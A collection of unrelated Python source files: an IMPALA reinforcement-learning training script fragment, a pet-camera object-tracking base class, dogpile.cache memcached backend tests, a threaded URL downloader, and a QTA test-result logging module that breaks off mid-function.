hooks = [tf.train.StopAtStepHook(last_step=max_steps)] # , PyProcessHook()]
# TODO adjust tf.Config for flexible node placement on GPUs
tf_config = tf.ConfigProto(allow_soft_placement=True, # soft placement to allow flexible training on CPU/GPU
intra_op_parallelism_threads=1, # speed up training time
inter_op_parallelism_threads=1) # number of physical cores
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
with tf.train.MonitoredTrainingSession(master=server.target,
is_chief=is_chief,
checkpoint_dir=os.path.join("/tmp/impala/", date_string),
config=tf_config,
save_checkpoint_secs=120,
hooks=hooks) as mon_sess:
normalizer.setup(session=mon_sess)
while not mon_sess.should_stop():
# learner batches from experience buffer and updates policy network
# actors only enqueue trajectories into the FIFO queue
worker.work(session=mon_sess)
print('{}:{} wants to join ... Training finished!'.format(job_name, task_index))
if is_chief:
logs.close()
server.join()
def play(args, **kwargs):
""" play mode """
print(args.dir)
assert args.dir, 'Please provide directory where checkpoint file is located'
kwargs['normalize'] = True
normed_env = U.make_env(**kwargs) # use env.setup() after session creation to apply mean/std to obs and rewards
model = ImpalaModel(observation_shape=normed_env.observation_space.shape,
n_actions=normed_env.action_space.n, learning_rate=0.01, entropy_scale=0.0)
# max_steps = 10000
# hooks = [tf.train.StopAtStepHook(last_step=max_steps)] # , PyProcessHook()]
print('Restore from:', args.dir)
with tf.train.SingularMonitoredSession(checkpoint_dir=args.dir) as sess:
normed_env.setup(session=sess) # restore values for running mean/std
print('Restored from global step:', sess.run(model.global_step))
try:
done = False
obs = normed_env.reset()
print(obs)
while not done:
normed_env.render()
action, _ = model.get_action_and_prob(session=sess, observation=obs)
obs, reward, done, info = normed_env.step(action)
except KeyboardInterrupt:
print('got KeyboardInterrupt')
finally:
pass
def main(args, **kwargs):
print('--> Using the following configuration:')
print(kwargs)
num_actors = 2
cluster = tf.train.ClusterSpec({
"worker": ['localhost:{}'.format(8000 + i) for i in range(num_actors)],
"learner": ["localhost:9000"]
})
queue = Queue(maxsize=100)
bs = kwargs['batch_size']
horizon = kwargs['horizon']
lr = kwargs['learning_rate']
es = kwargs['entropy_scale']
max_steps = kwargs['max_steps']
seq_len = kwargs['sequence_length']
processes = []
# define processes as daemon so that children terminate when parent crashes
params = (cluster, 'learner', 0, queue, kwargs, horizon, seq_len, lr, es, max_steps, bs)
p = Process(target=training, args=params)
p.daemon = True
p.start()
processes.append(p)
for actor_id in range(num_actors): # create worker processes
params = (cluster, 'worker', actor_id, queue, kwargs, horizon, seq_len, lr, es, max_steps, bs)
p = Process(target=training, args=params)
p.daemon = True
p.start()
processes.append(p)
print('ALL PROCESSES STARTED')
# time.sleep(5)
for p in processes:
p.join()
print('ALL JOINED')
if __name__ == '__main__':
shared_job_device = '/job:learner/task:0'
    # run with the module's default hyper-parameters defined above
    main(shared_job_device, **get_default_parameters())
|
dogcamaibase.py
|
from dogcamlogger import DogCamLogger, DCLogLevel
import threading
import time
import queue
import cv2
class DogCamAIBase():
debugDisplay = False
# Queue of movement commands necessary for the robot.
# The main file handles the interclass processing of these commands.
commandQueue = queue.Queue()
# The thread object
_thread = None
# The current image to display
_image = None
# The image to work on next
__pendingImage = None
# Width of the image to process
_width = 0
# Height of the image to process
_height = 0
# Thickness of the borders
_boundsX = 0
# Thickness of the borders
_boundsY = 0
# Thread flags
_runningThread = False
# AI Confidence levels
_minConfidence = 0
# If we should log match data
_logMatches = False
# Tilt Throttling
_blockTiltMove = False
_LastTiltMoveTime = 0
_TiltMoveCooldown = 0.75
_ThrottleTiltMovement = False
def __init__(self):
DogCamLogger.Log("AI: Allocated", DCLogLevel.Verbose)
def Initialize(self, boundsXSize=10, boundsYSize=10, minimumConfidence=0.3, displayOut=False,
detectionID=0, logMatches=False, throttleTilt=False, tiltCooldown=0.75):
self.debugDisplay = displayOut
self._boundsX = int(boundsXSize)
self._boundsY = int(boundsYSize)
self._minConfidence = float(minimumConfidence)
self._image = None
self._logMatches = logMatches
self.__pendingImage = None
self._targetID = detectionID
self._ThrottleTiltMovement = throttleTilt
self._TiltMoveCooldown = tiltCooldown
self._thread = threading.Thread(target=self.__Update)
DogCamLogger.Log("AI: Initialized", DCLogLevel.Debug)
    # Each AI model needs to implement this; pull the current working image from the
    # self._image class member.
def _ProcessImageInternal(self):
raise NotImplementedError
def SetDimensions(self, W, H):
self._width = int(W)
self._height = int(H)
DogCamLogger.Log(f"AI: Resolution is {self._width}x{self._height}")
def PushImage(self, image):
if image is None:
DogCamLogger.Log("AI: Image pushed was empty", DCLogLevel.Debug)
return
self.__pendingImage = image
def __Update(self):
# Create Debug window
if self.debugDisplay:
cv2.startWindowThread()
cv2.namedWindow("Output", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Output", (320, 240))
while self._runningThread:
if self.__pendingImage is not None:
self._image = self.__pendingImage
self.__pendingImage = None
self.__ProcessImage()
self._image = None
time.sleep(0.0001)
cv2.destroyAllWindows()
def Start(self):
DogCamLogger.Log("AI: AI Processing Started", DCLogLevel.Notice)
self._runningThread = True
self._thread.start()
def Stop(self):
if self._runningThread:
DogCamLogger.Log("AI: AI Processing Halted", DCLogLevel.Warn)
self._runningThread = False
self._thread.join()
def __ProcessImage(self):
        # Unlikely, but we'll be safe anyway
if self._image is None:
DogCamLogger.Log("AI: Skipping blank image", DCLogLevel.Debug)
return
ProcessingTime=time.time()
# Handle tilt throttling
if (ProcessingTime - self._LastTiltMoveTime) > self._TiltMoveCooldown:
self._blockTiltMove = False
DogCamLogger.Log(f"AI: Processing image at {ProcessingTime}!", DCLogLevel.Verbose)
self._ProcessImageInternal()
ProcessingTime=time.time()-ProcessingTime
if self.debugDisplay:
DogCamLogger.Log("AI: Displaying image", DCLogLevel.Debug)
cv2.imshow("Output", self._image)
DogCamLogger.Log(f"AI: Image processed in {ProcessingTime} seconds", DCLogLevel.Verbose)
def _LogObjectFound(self, objectID, confidence):
if confidence >= self._minConfidence and self._logMatches is True:
DogCamLogger.Log(f"AI: Found object {objectID} with confidence {confidence}")
def _DrawBoundingBox(self):
        # Draw the edge bounding box around the image (these are the boundaries of the detection square)
# Anything within this box is considered to be in focus.
cv2.rectangle(self._image, (self._boundsX, self._boundsY), (self._width-self._boundsX,
self._height-self._boundsY), (100,0,100), 4)
def _HandleObjectDetectionResult(self, left, right, top, bottom):
# Draw a bounding box around the object we've detected
cv2.rectangle(self._image, (left, top), (right, bottom), (100,25,0), 2)
# Do inverse AABB bounding collision testing
BoxTop = (top < self._boundsY)
BoxBottom = (bottom > self._height-self._boundsY)
BoxLeft = (left <= self._boundsX)
BoxRight = (right > self._width-self._boundsX)
        # If the dog is in a wide shot
        # (meaning it triggers both the left and right collision at the same time),
        # don't attempt to over-adjust
if BoxLeft ^ BoxRight:
if BoxLeft:
self.commandQueue.put_nowait("left")
else:
self.commandQueue.put_nowait("right")
# Same as the above but in portrait
if BoxTop ^ BoxBottom:
if self._blockTiltMove is False:
if BoxTop:
self.commandQueue.put_nowait("top")
else:
self.commandQueue.put_nowait("bottom")
self._LastTiltMoveTime = time.time()
# Handle throttling tilting movement
if self._ThrottleTiltMovement is True:
self._blockTiltMove = True
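# Illustrative sketch (not part of the original module): how the main file might drain
# commandQueue, which the class comment above says is processed elsewhere. The camera
# control step is a hypothetical placeholder.
def _example_command_queue_consumer(ai):
    while not ai.commandQueue.empty():
        direction = ai.commandQueue.get_nowait()
        # a real consumer would forward the movement command to the pan/tilt hardware here
        DogCamLogger.Log(f"Main: would move camera {direction}", DCLogLevel.Debug)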
|
test_memcached_backend.py
|
import os
from threading import Thread
import time
from unittest import TestCase
import weakref
import pytest
from dogpile.cache.backends.memcached import GenericMemcachedBackend
from dogpile.cache.backends.memcached import MemcachedBackend
from dogpile.cache.backends.memcached import PylibmcBackend
from . import eq_
from ._fixtures import _GenericBackendTest
from ._fixtures import _GenericMutexTest
MEMCACHED_PORT = os.getenv("DOGPILE_MEMCACHED_PORT", "11211")
MEMCACHED_URL = "127.0.0.1:%s" % MEMCACHED_PORT
expect_memcached_running = bool(os.getenv("DOGPILE_MEMCACHED_PORT"))
LOCK_TIMEOUT = 1
class _TestMemcachedConn(object):
@classmethod
def _check_backend_available(cls, backend):
try:
client = backend._create_client()
client.set("x", "y")
assert client.get("x") == "y"
except Exception:
if not expect_memcached_running:
pytest.skip(
"memcached is not running or "
"otherwise not functioning correctly"
)
else:
raise
class _NonDistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {"arguments": {"url": MEMCACHED_URL}}
class _DistributedMemcachedWithTimeoutTest(
_TestMemcachedConn, _GenericBackendTest
):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {
"arguments": {
"url": MEMCACHED_URL,
"distributed_lock": True,
"lock_timeout": LOCK_TIMEOUT,
}
}
class _DistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {
"arguments": {"url": MEMCACHED_URL, "distributed_lock": True}
}
class _DistributedMemcachedMutexTest(_TestMemcachedConn, _GenericMutexTest):
config_args = {
"arguments": {"url": MEMCACHED_URL, "distributed_lock": True}
}
class _DistributedMemcachedMutexWithTimeoutTest(
_TestMemcachedConn, _GenericMutexTest
):
config_args = {
"arguments": {
"url": MEMCACHED_URL,
"distributed_lock": True,
"lock_timeout": LOCK_TIMEOUT,
}
}
class PylibmcTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.pylibmc"
class BMemcachedSkips(object):
def test_threaded_dogpile(self):
pytest.skip("bmemcached is too unreliable here")
def test_threaded_get_multi(self):
pytest.skip("bmemcached is too unreliable here")
def test_mutex_threaded_dogpile(self):
pytest.skip("bmemcached is too unreliable here")
def test_mutex_threaded(self):
pytest.skip("bmemcached is too unreliable here")
class BMemcachedTest(BMemcachedSkips, _NonDistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedWithTimeoutTest(
BMemcachedSkips, _DistributedMemcachedWithTimeoutTest
):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedTest(BMemcachedSkips, _DistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexTest(
BMemcachedSkips, _DistributedMemcachedMutexTest
):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexWithTimeoutTest(
BMemcachedSkips, _DistributedMemcachedMutexWithTimeoutTest
):
backend = "dogpile.cache.bmemcached"
class MemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.memcached"
class MockGenericMemcachedBackend(GenericMemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockMemcacheBackend(MemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockPylibmcBackend(PylibmcBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(
self.url, binary=self.binary, behaviors=self.behaviors
)
class MockClient(object):
clients = set()
def __init__(self, *arg, **kw):
self.arg = arg
self.kw = kw
self.canary = []
self._cache = {}
self.clients.add(weakref.ref(self, MockClient._remove))
@classmethod
def _remove(cls, ref):
cls.clients.remove(ref)
@classmethod
def number_of_clients(cls):
return len(cls.clients)
def get(self, key):
return self._cache.get(key)
def set(self, key, value, **kw):
self.canary.append(kw)
self._cache[key] = value
def delete(self, key):
self._cache.pop(key, None)
class PylibmcArgsTest(TestCase):
def test_binary_flag(self):
backend = MockPylibmcBackend(arguments={"url": "foo", "binary": True})
eq_(backend._create_client().kw["binary"], True)
def test_url_list(self):
backend = MockPylibmcBackend(arguments={"url": ["a", "b", "c"]})
eq_(backend._create_client().arg[0], ["a", "b", "c"])
def test_url_scalar(self):
backend = MockPylibmcBackend(arguments={"url": "foo"})
eq_(backend._create_client().arg[0], ["foo"])
def test_behaviors(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "behaviors": {"q": "p"}}
)
eq_(backend._create_client().kw["behaviors"], {"q": "p"})
def test_set_time(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "memcached_expire_time": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "min_compress_len": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
def test_no_set_args(self):
backend = MockPylibmcBackend(arguments={"url": "foo"})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{}])
class MemcachedArgstest(TestCase):
def test_set_time(self):
backend = MockMemcacheBackend(
arguments={"url": "foo", "memcached_expire_time": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockMemcacheBackend(
arguments={"url": "foo", "min_compress_len": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
class LocalThreadTest(TestCase):
def setUp(self):
import gc
gc.collect()
eq_(MockClient.number_of_clients(), 0)
def test_client_cleanup_1(self):
self._test_client_cleanup(1)
def test_client_cleanup_3(self):
self._test_client_cleanup(3)
def test_client_cleanup_10(self):
self._test_client_cleanup(10)
def _test_client_cleanup(self, count):
backend = MockGenericMemcachedBackend(arguments={"url": "foo"})
canary = []
flag = [False]
def f(delay):
backend._clients.memcached
canary.append(MockClient.number_of_clients())
while not flag[0]:
time.sleep(0.02)
threads = [Thread(target=f, args=(count - i,)) for i in range(count)]
for t in threads:
t.start()
flag[0] = True
for t in threads:
t.join()
eq_(canary, [i + 1 for i in range(count)])
import gc
gc.collect()
eq_(MockClient.number_of_clients(), 0)
|
direct_downloader.py
|
# Written by: Derek Santos
# 3rd Party Modules
import requests
# Python Modules
import os
import re
from threading import Thread, active_count
from queue import Queue
import shutil
import logging
from time import sleep
""" Setting up logging """
LOG_FORMAT = "[%(levelname)s] %(asctime)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
class Download_Manager():
def __init__(self, list_of_urls: list, threads: int, directory_path: str):
# Setting up queue
self.queue = Queue()
# Number of threads
self.number_of_threads = threads
# Directory downloading to
self.directory_path = directory_path
# Putting all urls into the queue
for url in list_of_urls:
# If url is blank, continue
if url == '' or url == ' ':
continue
self.queue.put(url)
def start(self):
""" Start the threads to download urls within the queue """
# Setting up thread
self.workers = [Download_Worker(self.queue, self.directory_path)
for pos in range(self.number_of_threads)]
        # Block while the queue still has URLs or any worker threads are alive
        # NOTE: when all workers are done, only the main thread remains
while not self.queue.empty() or active_count() > 1:
# logging.debug('QUEUE: ' + str(self.queue.qsize()))
sleep(0.1)
class Download_Worker():
def __init__(self, queue, directory_path):
# Init Queue
self.queue = queue
# Path to download to
        if directory_path[-1:] != '/' and directory_path[-1:] != '\\':
self.directory_path = directory_path + '/'
else:
self.directory_path = directory_path
# Init Thread
self.thread = Thread(target=self.download, daemon=True, args=())
self.thread.start()
def delete_file(self, path: str):
# Delete path if exists
if os.path.exists(path):
os.remove(path)
def get_file_name(self, path: str):
# The name of the file will be extracted from the url.
file_name_start_pos = path.rfind('/') + 1
file_name = path[file_name_start_pos:]
return file_name
def download(self):
""" Downloads a url that is stored within the queue variable """
while not self.queue.empty():
try:
# Store the url to use
url = self.queue.get()
file_name = self.get_file_name(url)
# If a file within the directory exists, skip the file
if os.path.exists(self.directory_path + file_name):
logging.debug('Skipping: ' + url)
continue
# if self.queue.empty():
# return
# else:
# continue
# Attempt connection to url
req = requests.get(url, stream=True)
                # If the download request failed, alert the user and skip
if req.status_code != 200:
                    logging.debug('Could not download: ' + url)
continue
# Start storing the contents of the url within a file.
logging.info('Downloading: ' + url)
with open(self.directory_path + file_name, 'wb') as current_file:
req.raw.decode_content = True
shutil.copyfileobj(req.raw, current_file)
# print('\n' + url, '- Done.')
except Exception as e:
                # If an error occurred during downloading,
# then delete the incomplete file
logging.debug('ERROR DOWNLOADING: ' + str(e))
self.delete_file(self.directory_path + file_name)
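# Illustrative sketch (not part of the original module): typical use of the manager above.
# The URL list and target directory are made-up examples.
def _example_download_manager_usage():
    urls = ['https://example.com/a.txt', 'https://example.com/b.txt']
    manager = Download_Manager(urls, threads=2, directory_path='./downloads')
    # start() blocks until the queue is drained and all worker threads have finished
    manager.start()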
|
testresult.py
|
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''
Test result module
The design follows the logging module; example usage::
    result = TestResult()
    result.add_handler(StreamResultHandler())
    result.begin_test()
    result.start_step('a step')
    result.info('test')
    result.end_test()
The result.info interface can also carry extended information via record, for example::
    result.error('', 'an exception occurred', traceback=traceback.format_exc())
Like a logger, the TestResult object guarantees that all calls to the ITestResultHandler
objects are thread-safe; a new handler can be written by implementing ITestResultHandler,
see the ITestResultHandler interface for details
'''
import json
import locale
import os
import six
import socket
import sys
import time
import threading
import traceback
import xml.dom.minidom as dom
import xml.parsers.expat as xmlexpat
import xml.sax.saxutils as saxutils
from testbase import context
from testbase.util import smart_text, get_thread_traceback, get_method_defined_class, \
to_pretty_xml, smart_binary, ensure_binary_stream, codecs_open, get_time_str, \
translate_bad_char, file_encoding, path_exists
os_encoding = locale.getdefaultlocale()[1]
class EnumLogLevel(object):
    '''Log levels
'''
DEBUG = 10
INFO = 20
    Environment = 21  # test environment info; device/devices gives the device(s) used, machine gives the host executing the test
ENVIRONMENT = Environment
RESOURCE = 22
WARNING = 30
ERROR = 40
    ASSERT = 41  # assertion failure, with actual/expect/code_location in the record
CRITICAL = 60
    APPCRASH = 61  # the test target crashed
    TESTTIMEOUT = 62  # test execution timed out
    RESNOTREADY = 69  # the current resources cannot satisfy the requirements of the test execution
levelname = {}
for name in EnumLogLevel.__dict__:
value = EnumLogLevel.__dict__[name]
if isinstance(value, int):
levelname[value] = name
def _convert_timelength(sec):
h = int(sec / 3600)
sec -= h * 3600
m = int(sec / 60)
sec -= m * 60
return (h, m, sec)
def smart_text_by_lines(s):
    '''Convert an arbitrary string to UTF-8 encoding
'''
lines = []
for line in s.split('\n'):
lines.append(smart_text(line))
return '\n'.join(lines)
class TestResultBase(object):
    '''Base class for test results
    The responsibilities of this class are:
    1. provide the basic test result interface
    2. guarantee thread safety
    3. decide the pass/fail logic of a test
    '''
def __init__(self):
        '''Constructor
        '''
self.__lock = threading.RLock()
        self.__steps_passed = [True]  # preset one entry in case the test case never starts a step
self.__curr_step = 0
self.__accept_result = False
self.__testcase = None
self.__begin_time = None
self.__end_time = None
self.__error_level = 0
self.__failed_info = ""
self.__failed_priority = 0
@property
def testcase(self):
        '''The corresponding test case
        :returns: TestCase
'''
return self.__testcase
@property
def passed(self):
        '''Whether the test passed
        :returns: True or False
'''
return all(self.__steps_passed)
@property
def failed_reason(self):
        '''Reason why the test case failed
        :returns: str
'''
if self.__error_level:
return levelname.get(self.__error_level, 'unknown')
else:
return ''
@property
def failed_info(self):
        '''Execution details at the time the test case failed
        :returns: str
'''
return self.__failed_info
@property
def begin_time(self):
        '''Start time of the test case
        :returns: float
'''
return self.__begin_time
@property
def end_time(self):
        '''End time of the test case
        :returns: float
'''
return self.__end_time
def begin_test(self, testcase):
        '''Start executing a test case
        :param testcase: the test case
        :type testcase: TestCase
'''
with self.__lock:
if self.__accept_result:
raise RuntimeError("此时不可调用begin_test")
self.__accept_result = True
self.__begin_time = time.time()
self.handle_test_begin(testcase)
self.__testcase = testcase
def end_test(self):
        '''Finish executing a test case
'''
with self.__lock:
if not self.__accept_result:
raise RuntimeError("此时不可调用end_test")
self.handle_step_end(self.__steps_passed[self.__curr_step])
self.__end_time = time.time()
            self.handle_test_end(self.passed)  # guard against the case where no step was ever started
self.__accept_result = False
def begin_step(self, msg):
        '''Begin a test step
        :param msg: name of the test step
        :type msg: string
'''
with self.__lock:
if not self.__accept_result:
raise RuntimeError("此时不可调用begin_step")
if len(self.__steps_passed) != 1:
self.handle_step_end(self.__steps_passed[self.__curr_step])
self.__steps_passed.append(True)
self.__curr_step += 1
self.handle_step_begin(msg)
def log_record(self, level, msg, record=None, attachments=None):
        '''Handle a log record
        :param level: log level, see EnumLogLevel
        :type level: int
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
'''
if record is None:
record = {}
if attachments is None:
attachments = {}
if not isinstance(msg, six.string_types):
raise ValueError("msg='%r'必须是string类型" % msg)
msg = smart_text(msg)
if level >= EnumLogLevel.ERROR:
self.__steps_passed[self.__curr_step] = False
if level > self.__error_level:
self.__error_level = level
extra_record, extra_attachments = self._get_extra_fail_record_safe()
record.update(extra_record)
attachments.update(extra_attachments)
if self.__failed_priority <= 3 and level == EnumLogLevel.APPCRASH:
self.__failed_info, self.__failed_priority = "Crash", 3
if self.__failed_priority <= 2 and level == EnumLogLevel.TESTTIMEOUT:
self.__failed_info, self.__failed_priority = "用例执行超时", 2
if self.__failed_priority <= 1 and level == EnumLogLevel.ASSERT:
self.__failed_info, self.__failed_priority = msg, 1
if self.__failed_priority <= 1 and "traceback" in record:
            if not self.__failed_info:  # prefer the first exception recorded; it is most likely the cause of the problem
self.__failed_info, self.__failed_priority = record["traceback"].split('\n')[-2], 1
with self.__lock:
if not self.__accept_result:
return
self.handle_log_record(level, msg, record, attachments)
def _get_extra_fail_record_safe(self, timeout=300):
        '''Call the test case's get_extra_fail_record in a separate thread
        '''
def _run(outputs, errors):
try:
outputs.append(context.current_testcase().get_extra_fail_record())
except:
errors.append(traceback.format_exc())
errors = []
outputs = []
t = threading.Thread(target=_run, args=(outputs, errors))
t.daemon = True
t.start()
t.join(timeout)
extra_record, extra_attachments = {}, {}
with self.__lock:
if t.is_alive():
stack = get_thread_traceback(t)
self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息超过了指定时间:%ds' % timeout,
{'traceback':stack},
{})
else:
if errors:
self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息失败',
{'traceback':errors[0]}, {})
else:
record_info = outputs[0]
if isinstance(record_info, (tuple, list)) and len(record_info) == 2:
extra_record, extra_attachments = record_info
else:
cls = get_method_defined_class(self.testcase.get_extra_fail_record)
if cls.__module__ == '__main__':
class_path = cls.__name__
else:
class_path = "%s.%s" % (cls.__module__, cls.__name__)
raise RuntimeError("%s.get_extra_fail_record must return a 2 elements tuple" % class_path)
return extra_record, extra_attachments
def debug(self, msg, record=None, attachments=None):
        '''Handle a DEBUG log record
'''
self.log_record(EnumLogLevel.DEBUG, msg, record, attachments)
def info(self, msg, record=None, attachments=None):
        '''Handle an INFO log record
'''
self.log_record(EnumLogLevel.INFO, msg, record, attachments)
def warning(self, msg, record=None, attachments=None):
        '''Handle a WARNING log record
'''
self.log_record(EnumLogLevel.WARNING, msg, record, attachments)
def error(self, msg, record=None, attachments=None):
        '''Handle an ERROR log record
'''
self.log_record(EnumLogLevel.ERROR, msg, record, attachments)
def exception(self, msg, record=None, attachments=None):
        '''Handle an exception: log a CRITICAL record together with the current traceback
'''
if record is None:
record = {}
record['traceback'] = traceback.format_exc()
self.log_record(EnumLogLevel.CRITICAL, msg, record, attachments)
def handle_test_begin(self, testcase):
        '''Handle the start of a test case execution
        :param testcase: the test case
        :type testcase: TestCase
'''
pass
def handle_test_end(self, passed):
        '''Handle the end of a test case execution
        :param passed: whether the test case passed
        :type passed: boolean
'''
pass
def handle_step_begin(self, msg):
        '''Handle the start of a test step
        :param msg: name of the test step
        :type msg: string
'''
pass
def handle_step_end(self, passed):
        '''Handle the end of a test step
        :param passed: whether the test step passed
        :type passed: boolean
'''
pass
def handle_log_record(self, level, msg, record, attachments):
        '''Handle a log record
        :param level: log level, see EnumLogLevel
        :type level: int
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
'''
pass
class EmptyResult(TestResultBase):
    '''A result that produces no output
    '''
pass
class StreamResult(TestResultBase):
    '''Stream output of a test case
    '''
_seperator1 = "-" * 40 + "\n"
_seperator2 = "=" * 60 + "\n"
def __init__(self, stream=sys.stdout):
        '''Constructor
        :param stream: the stream object
        :type stream: file
'''
super(StreamResult, self).__init__()
self._stream, encoding = ensure_binary_stream(stream)
self._write = lambda x: self._stream.write(smart_binary(x, encoding=encoding))
self._step_results = []
def handle_test_begin(self, testcase):
        '''Handle the start of a test case execution
        :param testcase: the test case
        :type testcase: TestCase
'''
self._write(self._seperator2)
owner = getattr(testcase, 'owner', None)
priority = getattr(testcase, 'priority', None)
timeout = getattr(testcase, 'timeout', None)
begin_msg = "测试用例:%s 所有者:%s 优先级:%s 超时:%s分钟\n" % (testcase.test_name, owner, priority, timeout)
self._write(begin_msg)
self._write(self._seperator2)
def handle_test_end(self, passed):
        '''Handle the end of a test case execution
        :param passed: whether the test case passed
        :type passed: boolean
'''
self._write(self._seperator2)
self._write("测试用例开始时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)))
self._write("测试用例结束时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time)))
self._write("测试用例执行时间: %02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time))
rsttxts = {True:'通过', False:'失败'}
steptxt = ''
for i, ipassed in enumerate(self._step_results):
steptxt += " %s:%s" % (i + 1, rsttxts[ipassed])
self._write("测试用例步骤结果: %s\n" % steptxt)
self._write("测试用例最终结果: %s\n" % rsttxts[passed])
self._write(self._seperator2)
def handle_step_begin(self, msg):
        '''Handle the start of a test step
        :param msg: name of the test step
        :type msg: string
'''
if not isinstance(msg, six.string_types):
raise ValueError("msg='%r'必须是string类型" % msg)
self._write(self._seperator1)
self._write("步骤%s: %s\n" % (len(self._step_results) + 1, msg))
def handle_step_end(self, passed):
        '''Handle the end of a test step
        :param passed: whether the test step passed
        :type passed: boolean
'''
self._step_results.append(passed)
def handle_log_record(self, level, msg, record, attachments):
        '''Handle a log record
        :param level: log level, see EnumLogLevel
        :type level: int
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
'''
self._write("%s: %s\n" % (levelname[level], msg))
if level == EnumLogLevel.ASSERT:
if "actual" in record:
actual = record["actual"]
self._write(" 实际值:%s%s\n" % (actual.__class__, actual))
if "expect" in record:
expect = record["expect"]
self._write(" 期望值:%s%s\n" % (expect.__class__, expect))
if "code_location" in record:
self._write(smart_text(' File "%s", line %s, in %s\n' % record["code_location"]))
if "traceback" in record:
self._write(smart_text_by_lines("%s\n" % record["traceback"]))
for name in attachments:
file_path = smart_text(attachments[name])
if path_exists(file_path):
file_path = os.path.abspath(file_path)
self._write(" %s:%s\n" % (smart_text(name), file_path))
class XmlResult(TestResultBase):
    '''Test case result in XML format
    '''
def __init__(self, testcase):
        '''Constructor
        :param testcase: the test case whose result will be written to an XML file
        :type testcase: TestCase
'''
super(XmlResult, self).__init__()
self._xmldoc = dom.Document()
translated_name = translate_bad_char(testcase.test_name)
max_name_len = 200
if len(translated_name) > max_name_len:
translated_name = translated_name[:max_name_len]
self._file_path = '%s_%s.xml' % (translated_name, get_time_str())
@property
def file_path(self):
'''xml文件路径
:returns: str
'''
return self._file_path
def handle_test_begin(self, testcase):
        '''Handle the start of a test case execution
        :param testcase: the test case
        :type testcase: TestCase
'''
self._xmldoc.appendChild(self._xmldoc.createProcessingInstruction("xml-stylesheet", 'type="text/xsl" href="TestResult.xsl"'))
owner = getattr(testcase, 'owner', None)
priority = getattr(testcase, 'priority', None)
timeout = getattr(testcase, 'timeout', None)
self._testnode = self._xmldoc.createElement('TEST')
self._testnode.setAttribute("name", smart_text(saxutils.escape(testcase.test_name)))
self._testnode.setAttribute("owner", smart_text(saxutils.escape(str(owner))))
self._testnode.setAttribute("priority", str(priority))
self._testnode.setAttribute("timeout", str(timeout))
self._testnode.setAttribute('begintime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)))
self._xmldoc.appendChild(self._testnode)
        self.begin_step('Test case initial step')
def handle_test_end(self, passed):
        '''Handle the end of a test case execution
        :param passed: whether the test case passed
        :type passed: boolean
        '''
self._testnode.setAttribute('result', str(passed))
self._testnode.setAttribute('endtime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time)))
self._testnode.setAttribute('duration', "%02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time))
if self._file_path:
with codecs_open(smart_text(self._file_path), 'wb') as fd:
fd.write(to_pretty_xml(self._xmldoc))
def handle_step_begin(self, msg):
        '''Handle the beginning of a test step
        :param msg: name of the test step
        :type msg: string
        '''
        if not isinstance(msg, six.string_types):
            raise ValueError("msg='%r' must be a string" % msg)
self._stepnode = self._xmldoc.createElement("STEP")
self._stepnode.setAttribute('title', smart_text(msg))
self._stepnode.setAttribute('time', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time())))
self._testnode.appendChild(self._stepnode)
def handle_step_end(self, passed):
